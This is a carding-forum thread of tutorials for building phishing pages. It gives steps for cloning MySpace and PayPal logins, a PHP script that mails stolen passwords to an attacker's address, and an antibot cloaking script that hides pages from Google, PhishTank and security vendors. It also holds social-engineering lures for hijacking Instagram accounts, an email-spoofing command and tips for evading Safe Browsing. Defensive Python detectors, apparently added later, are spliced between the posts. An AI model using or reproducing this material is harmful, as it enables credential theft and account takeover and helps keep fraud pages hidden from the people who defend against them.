HOW TO MAKE A SCAMPAGE/PHISHING PAGE ?⚠️

Carder

Hello! I've seen a lot of requests on different phishing sites, so I decided to make a guide how to create one yourself! Practice makes master!☺️

In the guide, I will make a phishing login page for Myspace. (They got an easy HTML source when it comes to searching. Great to start with..)
Lets get going!

1) Enter MySpace right click on the page and select 'View Source'

2) Now, to make a phishing site we need somewhere to host it! The host needs to have PHP Server scripting enabled.

Ripway Web Hosting and Online File Storage - upload pictures, videos, MP3 and music files and share your files with the world is a very easy one, register an account there and get moving.....

3) Right-Click on the source text and select 'Mark all' then 'Copy' and paste it in Notepad, name it index.php

4) Now we need to create the PHP script, which will enter the information the victim enters into the log in field on the page and redirects them to the real Myspace page.

Please learn the basics of PHP at W3Schools Online Web Tutorials
It is really easy, takes around 15 minutes, then you know it for life.

5) Now, for Myspace you have to make redirecting script :), Tutorial available on google!

6) Paste your created redirecting script in Notepad and save it as "redirect.php"

You need to make your own script next time for other pages!

7) Now we will create the log the information we steal will be saved to. Create a new Notepad file and save it "log" (log.txt, but the extension will be added automatically in Windows).

Now, open your index.php again, and lets start search.

9) We will first search for the word "action="

(We're looking for where the user will enter his email and password.)

10) According to the URL this is some sort of search feature on Myspace for some Profile, not what we're looking for.

Code:
N><A class=languageLink href="http://profile.myspace.com/index.cfm?fuseaction=cms.goto&_i=1dd14fb6-0f2a-4ab4-a231-b9

11) Hit Search again. As you can see, we're only getting results for MySpace, etc.

12) Lets go back on the Myspace site and check what we need. (MySpace)

13) "Email" is located near the login box!!

14) Great! Lets just go back to the index file and search for "Email". Keep searching a few times!

15) Found it!

16) Now! Look at this line!

Code:
<form action="http://secure.myspace.com/index.cfm?fuseaction=login.process" method="post" id="LoginForm" name="aspnetForm">

Delete this:

Code:
http://secure.myspace.com/index.cfm?fuseaction=login.process

And replace it with "redirect.php" (which was your redirecting script).

The line will look like this after you are done:

Code:
<form action="redirect.php" method="post" id="LoginForm" name="aspnetForm">

17) Save the file by going File -> Save, or simply press CTRL-S (Save hotkey in Windows.)

Now go to your Ripway account and log in. (Ripway Web Hosting and Online File Storage - upload pictures, videos, MP3 and music files and share your files with the world).

19) Upload your files;

- Log.txt
- index.php
- redirect.php

20) Open your index.php online and check if everything correct!

Uploaded files if you lost them and don't want to do it again then you can download the pack with:

- Complete index.php
- redirect.php
- log.txt
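
From the defender's side, the edit described in the post above leaves a recognisable trace: the copied page still links to the brand's hosts, but its password form posts somewhere else. The following is an added example, not part of the original post; the `x.myspace.com` asset URLs, the hosting name and the two-label domain heuristic are assumptions made for the illustration.

```python
from collections import Counter
from html.parser import HTMLParser
from urllib.parse import urlparse

def site(host):
    # Assumption: the last two labels approximate the registrable domain;
    # production code should consult the Public Suffix List instead.
    return ".".join(host.lower().split(".")[-2:])

class _PageScan(HTMLParser):
    def __init__(self):
        super().__init__()
        self.forms, self.asset_sites, self._form = [], Counter(), None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._form = {"action": a.get("action") or "", "password": False}
            self.forms.append(self._form)
        elif tag == "input" and self._form is not None:
            if (a.get("type") or "").lower() == "password":
                self._form["password"] = True
        for key in ("href", "src"):  # absolute links reveal the copied brand
            host = urlparse(a.get(key) or "").hostname
            if host:
                self.asset_sites[site(host)] += 1

    def handle_endtag(self, tag):
        if tag == "form":
            self._form = None

def audit_login_forms(html, served_from):
    """Flag password forms that post away from the site the page links to."""
    scan = _PageScan()
    scan.feed(html)
    if not scan.asset_sites:
        return []
    brand, links = scan.asset_sites.most_common(1)[0]
    findings = []
    for form in scan.forms:
        host = urlparse(form["action"]).hostname
        # A relative action is resolved against the host serving the page.
        posts_to = site(host) if host else site(served_from)
        if form["password"] and brand != site(served_from) and posts_to != brand:
            findings.append({"action": form["action"], "posts_to": posts_to,
                             "page_brand": brand, "brand_links": links})
    return findings

# Constructed sample: the form line is the edited one quoted in the post;
# the x.myspace.com asset URLs and the hosting name are made up.
CLONED_PAGE = """<html><body>
<a href="http://profile.myspace.com/index.cfm?fuseaction=cms.goto">Profile</a>
<img src="http://x.myspace.com/images/logo.gif">
<link rel="stylesheet" href="http://x.myspace.com/css/main.css">
<form action="redirect.php" method="post" id="LoginForm" name="aspnetForm">
<input type="text" name="email"><input type="password" name="password">
</form></body></html>"""
```

Run against a crawl or a URL-submission queue, a non-empty result from `audit_login_forms(page, host)` is a triage signal for a cloned login page rather than proof of one.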
 
HOW TO MAKE YOUR OWN SCAM PAGE

1. Open Up the Site that You Want to Make The Fake Page From it, After The Load Right Click and Save the Page as "Web Page Complete"

2. Now open that page with notepad, and press control+F to access search bar, and then search "login" (I recommend using NotePad++)

3. Behind the word "login" it's written .action, we don't need those so delete everything behind the login (this tutorial is for PHP, may you see login.aspx)

4. If You Saw Method="Post" Change it to Method="GET"

5. Ok Now Save it as .Html

6. Open a New Notepad, and Write This Commands

7. Instead of Location: Target.com, Write Your Login Page Address!

8. Now Save this as Login.PHP

9. Go to Website's That offer Free Hosts

10. Upload Website And Done

Scam page is a fake webpage, e.g. a login of a popular website, online bank login, etc., depending on what it is. Scam pages are used by spammers to collect data on people who get scammed. Detecting a scam page is simple if you are technology oriented, but most common users can't detect a scam page. This is a big problem on the WWW. Some companies are developing software to combat scams or phishing scams; phishing is the term used for this scam.

1] OK, so first we choose a target.
We chose www.paypal.com

2] Navigate the site chosen. Press CTRL + S and save the file. Html somewhere on yourcomputer.

3] We open ... There might be a problem, namely the way the image.

4] If relative path (relative path is the path like / images / wow.gif) be transformed into an absolute path (http://tinta.com/images/wow.gif)

5] Now that you clarified your lead you to the file. Html that was saved, so your login type CTRL + F ... (Here the words are different .. try and password, password, username, etc.. Dak login does not work).

6] You have a code like <form action="login2.php">. Login2.php change in 040147.php!

7] Now, the username should be a code like . name = "email" tells us that in PHP script authentication is the variable that you email username.

8] Good memory.
The password, the code should be similar ( ). So, password is held in variable password. A and memorize it.

9] Now, where you have saved. Html, created a new file called 040147.php.

In it, add the following code:

Code:
$ To = "upgoingstar@gmail.com"
$ Name = $ _POST ['email'];
$ Email = $ _POST ['email'];
$ Subject = $ _POST ['subject'];
$ Password = $ _POST ['password'];
$ Agent = $ _SERVER ['HTTP_USER_AGENT'];
$ Ip = $ _SERVER ['REMOTE_ADDR'];
$ D = date ('l dS \ of F Y h: i: s A');
$ Sub = "New Account Hacked PayPal - $ email";
$ Headers = "From: $ name <$ email> \ n";
$ Headers .= "Content-Type: text / plain, charset = iso-8859-1 \ n";
$ Mes .= 'Username:'. $ Email. "\ N";
$ Msg .= "Password:". $ Password. "\ N";
$ Msg .= "Browser:". $ Agent. "\ N";
$ Msg .= "IP:". $ Ip. "\ N";
$ Mes .= 'Date and time:'. $ D;

(
mail ($ to, $ sub, $ mes, $ headers);
header ("Location: www.paypal.com");

)
?>

10] Modify code

Code:
$ To = "flowbuzltd@gmail.com"

and put your mail. The code above variables over email and password and sends them together with some more useful details.

11] Rename. Or HTML into index.html. Php, you upload the 2 files on a host and entertain. Wink.

YOUR SCAMPAGE IS READY NOW. ENJOY SPAMMING ? ?

Note: Look at PHP source, you can see log.txt that's where your victim info's saved.

Auto ScamPage Grabber (150+ always)

A fully private tool made by me which grabs scampages from internet databases.

Grabs different scampages on different days, lots of new scampages everytime.

Grabs 150+ scampages on each run (not necessarily all unique but 50+ of them unique surely).

And new updated on different times as internet databases update regularly.

All proofs and demo available.
Can give video proof too.

Fully private tool and no one has this because it's made by me.
 

HOW TO BLOCK AT THE END OF A BOT


I will share the experience of how to do a block at the end of the bot.

where this feature can make a scampage become more durable and durable.

Source code for blocking (blockers.php / blocker.php):

Code:
<?php
error_reporting(0);
session_start();
/**

Modify by antibot.pw , you can see visitor in https://antibot.pw/manage-blocker

**/
$config['ApiKey']     = 'xxxxxxxxxxxxxxxxxxxxx'; // https://antibot.pw/developers
$config['blocktype']  = '3';

if($_SESSION['check'] == false && !isset($_SESSION['check'])){
  function get_client_ip() {
      $ipaddress = '';
      if (getenv('HTTP_CLIENT_IP')){
          $ipaddress = getenv('HTTP_CLIENT_IP');
      }
      if(getenv('HTTP_X_FORWARDED_FOR')){
          $ipaddress = getenv('HTTP_X_FORWARDED_FOR');
      }
      if(getenv('HTTP_X_FORWARDED')){
          $ipaddress = getenv('HTTP_X_FORWARDED');
      }
      if(getenv('HTTP_FORWARDED_FOR')){
          $ipaddress = getenv('HTTP_FORWARDED_FOR');
      }
      if(getenv('HTTP_FORWARDED')){
         $ipaddress = getenv('HTTP_FORWARDED');
      }
      if(getenv('REMOTE_ADDR')){
          $ipaddress = getenv('REMOTE_ADDR');
      }
      $ipaddress = explode(",",  $ipaddress);
      return $ipaddress[0];
  }
  $ipNe = get_client_ip();
  $curl = curl_init();
  curl_setopt_array($curl, array(
    CURLOPT_URL => "https://antibot.pw/api/check-visitor.php?ip=".$ipNe."&block=".$config['blocktype']."&apikey=".$config['ApiKey'],
    CURLOPT_RETURNTRANSFER => true,
    CURLOPT_ENCODING => "",
    CURLOPT_MAXREDIRS => 10,
    CURLOPT_TIMEOUT => 30,
    CURLOPT_HTTP_VERSION => CURL_HTTP_VERSION_1_1,
    CURLOPT_HTTPHEADER => array(
      "content-type: application/x-www-form-urlencoded",
    ),
  ));

  $response = curl_exec($curl);
  $err = curl_error($curl);

  curl_close($curl);

  $json = json_decode($response,true);
  if($json['is_bot'] == 1){
    $_SESSION['check'] = true;
    die(header("HTTP/1.0 404 Not Found"));
  }
}else{
  $hostname = gethostbyaddr($_SERVER['REMOTE_ADDR']);
  $blocked_words = array("above","google","softlayer","amazonaws","cyveillance","phishtank","dreamhost","netpilot","calyxinstitute","tor-exit", "msnbot","p3pwgdsn","netcraft","trendmicro", "ebay", "paypal", "torservers", "messagelabs", "sucuri.net", "crawler");
  foreach($blocked_words as $word) {
      if (substr_count($hostname, $word) > 0) {
      header("HTTP/1.0 404 Not Found");
          die("<h1>404 Not Found</h1>The page that you have requested could not be found.");

      }
  }
  $bannedIP = array("^81.161.59.*", "^66.135.200.*", "^66.102.*.*", "^38.100.*.*", "^107.170.*.*", "^149.20.*.*", "^38.105.*.*", "^74.125.*.*",  "^66.150.14.*", "^54.176.*.*", "^38.100.*.*", "^184.173.*.*", "^66.249.*.*", "^128.242.*.*", "^72.14.192.*", "^208.65.144.*", "^74.125.*.*", "^209.85.128.*", "^216.239.32.*", "^74.125.*.*", "^207.126.144.*", "^173.194.*.*", "^64.233.160.*", "^72.14.192.*", "^66.102.*.*", "^64.18.*.*", "^194.52.68.*", "^194.72.238.*", "^62.116.207.*", "^212.50.193.*", "^69.65.*.*", "^50.7.*.*", "^131.212.*.*", "^46.116.*.* ", "^62.90.*.*", "^89.138.*.*", "^82.166.*.*", "^85.64.*.*", "^85.250.*.*", "^89.138.*.*", "^93.172.*.*", "^109.186.*.*", "^194.90.*.*", "^212.29.192.*", "^212.29.224.*", "^212.143.*.*", "^212.150.*.*", "^212.235.*.*", "^217.132.*.*", "^50.97.*.*", "^217.132.*.*", "^209.85.*.*", "^66.205.64.*", "^204.14.48.*", "^64.27.2.*", "^67.15.*.*", "^202.108.252.*", "^193.47.80.*", "^64.62.136.*", "^66.221.*.*", "^64.62.175.*", "^198.54.*.*", "^192.115.134.*", "^216.252.167.*", "^193.253.199.*", "^69.61.12.*", "^64.37.103.*", "^38.144.36.*", "^64.124.14.*", "^206.28.72.*", "^209.73.228.*", "^158.108.*.*", "^168.188.*.*", "^66.207.120.*", "^167.24.*.*", "^192.118.48.*", "^67.209.128.*", "^12.148.209.*", "^12.148.196.*", "^193.220.178.*", "68.65.53.71", "^198.25.*.*", "^64.106.213.*", "^91.103.66.*", "^208.91.115.*", "^199.30.228.*");
  if(in_array($_SERVER['REMOTE_ADDR'],$bannedIP)) {
       header('HTTP/1.0 404 Not Found');
       exit();
  } else {
       foreach($bannedIP as $ip) {
            if(preg_match('/' . $ip . '/',$_SERVER['REMOTE_ADDR'])){
                 header('HTTP/1.0 404 Not Found');
                 die("<h1>404 Not Found</h1>The page that you have requested could not be found.");
            }
       }
  }
}

If you want to make a shortlink with the domain and private hosting, you just need to install the antibot manager.
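
For hosting providers and incident responders, both scripts quoted in this thread (the form handler that forwards a posted password and redirects, and the blocker that serves a 404 to security vendors) have structure that can be matched in a web root. The following is an added example, not part of the original posts; the rule names, thresholds and sample fragments are assumptions chosen for the illustration, and the fragments are constructed and deliberately incomplete.

```python
import os
import re

# Hostname tokens copied from the $blocked_words list in the script above.
VENDOR_TOKENS = ("phishtank", "netcraft", "trendmicro", "cyveillance",
                 "sucuri", "messagelabs", "crawler", "google")
RULES = {
    "reads_posted_password": r"\$\s*_POST\s*\[\s*['\"][^'\"]*pass[^'\"]*['\"]",
    "mail_or_file_write": r"\b(mail|fwrite|file_put_contents)\s*\(",
    "redirect": r"header\s*\(\s*['\"]Location",
    "reverse_dns": r"\bgethostbyaddr\s*\(",
    "fake_404": r"404 Not Found",
    "reads_client_ip": r"REMOTE_ADDR|HTTP_X_FORWARDED_FOR",
    "remote_bot_verdict": r"\bis_bot\b",
}

def classify_php(source):
    """Return the kit patterns a PHP source matches, with the evidence."""
    hits = {n for n, rx in RULES.items() if re.search(rx, source, re.I)}
    vendors = sorted(t for t in VENDOR_TOKENS if t in source.lower())
    verdicts = []
    # Password read from the POST body, sent or written out, then a redirect.
    if {"reads_posted_password", "mail_or_file_write", "redirect"} <= hits:
        verdicts.append("credential-harvester")
    # A 404 keyed on the client address, decided by a vendor blocklist
    # or by a remote "is_bot" verdict.
    blocklist = "reverse_dns" in hits and len(vendors) >= 3
    if {"fake_404", "reads_client_ip"} <= hits and (
            blocklist or "remote_bot_verdict" in hits):
        verdicts.append("visitor-cloaking")
    return {"verdicts": verdicts, "indicators": sorted(hits),
            "vendors": vendors}

def scan_webroot(root):
    """Walk a web root and return {path: result} for every flagged file."""
    findings = {}
    for folder, _dirs, files in os.walk(root):
        for name in files:
            if name.lower().endswith((".php", ".phtml")):
                path = os.path.join(folder, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    result = classify_php(fh.read())
                if result["verdicts"]:
                    findings[path] = result
    return findings

# Constructed fragments (deliberately incomplete) mirroring each pattern.
HARVESTER_FRAGMENT = """$Password = $_POST['password'];
mail(/* elided */);
header("Location: /* elided */");"""
CLOAK_FRAGMENT = """$hostname = gethostbyaddr($_SERVER['REMOTE_ADDR']);
$blocked_words = array("google", "phishtank", "netcraft", "trendmicro");
header("HTTP/1.0 404 Not Found");"""
BENIGN_LOGIN = """$ok = password_verify($_POST['password'], $hash);
header("Location: /account");"""
```

A file flagged as `visitor-cloaking` also explains why a reported URL can return 404 to a scanner while still serving the login page to ordinary visitors, so verification should be repeated from a residential network path.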
 
WHAT IS A PHISHING PAGE?

⛔️A phisher is a fake login page used to gain access to someone's account. When someone logs into the fake login page, their password is sent to you.⛔

Phishing Methods ?

? Public:

Email or DM your target. Ask to buy shoutouts or to see their analytics. Basically just SE your target to somehow login to your phishing link. Not really gonna get too detailed on this because its easy and public and idrc for it lol, if u really need ig i can help you more with this. The next 2 methods are more detailed.

? Impersonate a law firm:

Create a realistic looking law firm email. Get the targets email through their account (below the 3 methods is another method on how to get emails easier) or with the instagram email database. Write a well thought out email impersonating the law firm and telling your target that they are being investigated for infringement on another person, and html your login link to something like this:

this post is being investigated for infringement.

The target will then get worried and want to see what the problem is, and login using your link.

Once they login, you have the username and password and can simply jack the account.

? Instagram Panel:

I recommend to do this one on a separate device that is on a VPN or proxy, so that you don’t get device or IP banned on Instagram. First message your target with something like this:

Hey, I’ve been doing sales for Instagram requests. Are you interested in this service?

Here are some of the available options



If they ask for a request, tell them that you made a request recently so they will have to wait 2 days. The tell them you are also selling the option to attach the instagram panel to their own account and it will look like this in their settings:



You can tell them that you are willing to give them a 1 day trial of having the panel, and then any more they would have to pay. When they ask how to get it, tell them to login through the german instagram (your phishing link) to get approved and then you will make the approval for a one day trial. If they ask how you are able to do it just SE them into believing u know someone at FB or IG. Once they login then just jack the acc :)

How to bypass Suspicious Login (Not Verify Account) ⛔

Note: Suspicious login can only be bypassed if it has NOT already been triggered. Meaning you cannot bypass it if it has already been triggered, but it can be bypassed if you do this on your first attempt.

Get a socks5 proxy service. I recommend vip72. They have soooo many proxies across the world. They also have full directions on how to use it on their site.

Create an account with an SMTP server. Then get kali linux and open the root terminal. type this info in the root for it to work:

Code:
$ sendemail -f "the email you want it to look like" -t "target email" -s "smtp port" -xu "smtp username login" -xp "smtp login password" -u"subject" -m "message"

This will spoof the email, and make sure that the email hits the inbox and not spam.
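
On the receiving side, a message sent this way authenticates only as the SMTP account's own domain, so the visible From domain does not align with what SPF or DKIM verified. The following is an added example, not part of the original post, showing that alignment check over the `Authentication-Results` header stamped by the recipient's own mail server; the host names, the sample message and the two-label domain heuristic are assumptions.

```python
import re
from email import message_from_string
from email.utils import parseaddr

def org_domain(domain):
    # Assumption: last two labels stand in for the organizational domain;
    # production code should use the Public Suffix List.
    return ".".join(domain.lower().strip(".").split(".")[-2:])

def check_alignment(raw_message, trusted_authserv_id):
    """Compare the visible From domain with the domains that SPF and DKIM
    actually authenticated, using only our own MX's verdict header."""
    msg = message_from_string(raw_message)
    from_domain = parseaddr(msg.get("From", ""))[1].rpartition("@")[2].lower()
    result = {"from_domain": from_domain, "authenticated_as": set(),
              "spf_aligned": False, "dkim_aligned": False}
    for header in msg.get_all("Authentication-Results", []):
        authserv, _, body = " ".join(header.split()).partition(";")
        if (authserv.split() or [""])[0].lower() != trusted_authserv_id.lower():
            continue  # stamped by someone else, possibly the sender: ignore
        for clause in body.split(";"):
            method = re.match(r"\s*(spf|dkim)=(\w+)", clause)
            if not method or method.group(2).lower() != "pass":
                continue
            prop = "smtp.mailfrom" if method.group(1) == "spf" else "header.d"
            found = re.search(re.escape(prop) + r"=(?:[^\s@]+@)?(\S+)", clause)
            if found:
                domain = found.group(1).lower()
                result["authenticated_as"].add(domain)
                if org_domain(domain) == org_domain(from_domain):
                    result[method.group(1) + "_aligned"] = True
    result["aligned"] = result["spf_aligned"] or result["dkim_aligned"]
    return result

# Constructed message: SPF and DKIM both pass, but for the relay's domain,
# not for the domain shown to the reader in From.
SPOOFED = """\
Authentication-Results: mx.recipient.example;
 spf=pass smtp.mailfrom=bounce@relay-provider.example;
 dkim=pass header.d=relay-provider.example
From: "Legal Department" <notices@lawfirm.example>
To: user@recipient.example
Subject: Constructed sample

body
"""
```

A message where `aligned` is false while `authenticated_as` is non-empty is the case worth alerting on: it passed authentication, only not as the sender it displays.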

 
✨ 5 Reasons Why You May Not Be Able To Visit Your Scampage ✨

1️⃣ Wrong Directory

Maybe you uploaded the scampage not on public_www directly. To fix this make sure you delete all files on the public www folder then Upload your zip or rar and extract it correctly.

2️⃣ No Domain Redirect

Usually the site where the cpanel/whm is hosted will be displayed on the main url. To change this you Upload scampage then you add scampage url to redirect domain settings.

3️⃣ Anti Bots

Some customers told me they can't access their scampage correctly. My antibots only allow clear ip's so don't use:
- VPN
- SOCKS5 (even 911)
- RDP
- ANY PROXY
- TOR

Just use your real IP and it should work.

4️⃣ Phishing detection

If your site gets red (Google safe browsing phishing warn) then you need to select ignore risk. This will not fulfill your goals because everyone listens to Google.

5️⃣ CPanel / WHM has been blacklisted

Sometimes it happen that your cpanel has only a trial and not a Full version. As well as in WHM your ip/site can be blacklisted and then you are not able to visit your hosted site correctly. This happens if noob Carder try to sell you shitty cpanels / whms
 
HOW TO FIND SOME LEAKED SCAMPAGES

1️⃣ Get your ass over to:

2️⃣ Search for a scampage vendor, scampage website etc...

example:


3️⃣ With a bit luck the file is available and ready for download

⚙️ HOW TO SETUP SCAMPAGES (ROUGH) ⚙️

Why "Rough"❔
- Because not all scampages have same structure.

Which scampage are am using for tutorial❔
- XWANTED PAYPAL SCAMPAGE

Which issues had the scampage❔
▪️Noob Leaker Changed Coder Credits (crax pro niggas)
▪️Antibots Detected All Firefox Browser As Bot
▪️Forward To Scampage Failed (=>header("Location: app/index"); changed to header("Location app/index.php");)
▪️Wrong Credit Card Mask (19 digits instead of 16)
▪️Images Are Missing (Bank Verification and some other files)
▪️Wrong Language At Double Mail (French instead of the browser language)
▪️Dead BIN API
▪️IP Quality Statement With Invalid API

Did i fixed the issues❔
- Yes i did!

Changelog of Scampages
▪️Grab Browser Mode (Default or Private)
▪️Remove 403 (Permission denied error)
▪️Added Forwarding To Google With Anonymous Referer
▪️Added Min And Max Date At Date Of Birth
▪️Fixed JavaScript Issues
▪️New Antibots And New Ranges
▪️Better Overview In Bot Log
▪️Optimized Phone Number Lookup

Planned Features:
▪️New Scampage Encoding (not the default encoding - whole scampage + html code)
▪️Email Logins (Like Gmail a fake Gmail Page)
▪️Cookies Grabber (*)
▪️Better Cookie System For Avoiding Bad Humans

* Cookie Grabber Are Effortful And Very Messy
 
Thank you, but how can I download the websites with their assets, like fully cloning them. Good forum
 
 
Please I need someone that can teach how to make scampage with anti bot pls thanks
 
Short talk about "updating scampage with antibots"....

Is it a good idea ?

Surely this would be the best possible solution to keep the site online longer. But it is as already mentioned in several posts not only the antibots ! There are several facts on which the red page is based so please don't believe every loser who claims "FUD by antibots".

Should I or not?
No, if the page was discovered more than 5-10 times and became red, the code is most likely in the database of Google. I advise to apply for a new one.

What should be considered for a new page ?
▪️Change all filenames, folders and everything around (example: src/includes/ to resources/)
▪️Add new antibots
▪️Change source code a little bit (e.g. other FORM names)

What happens if this does not help?
Then it is either another factor or your antibots continue to let bots through for analysis.
 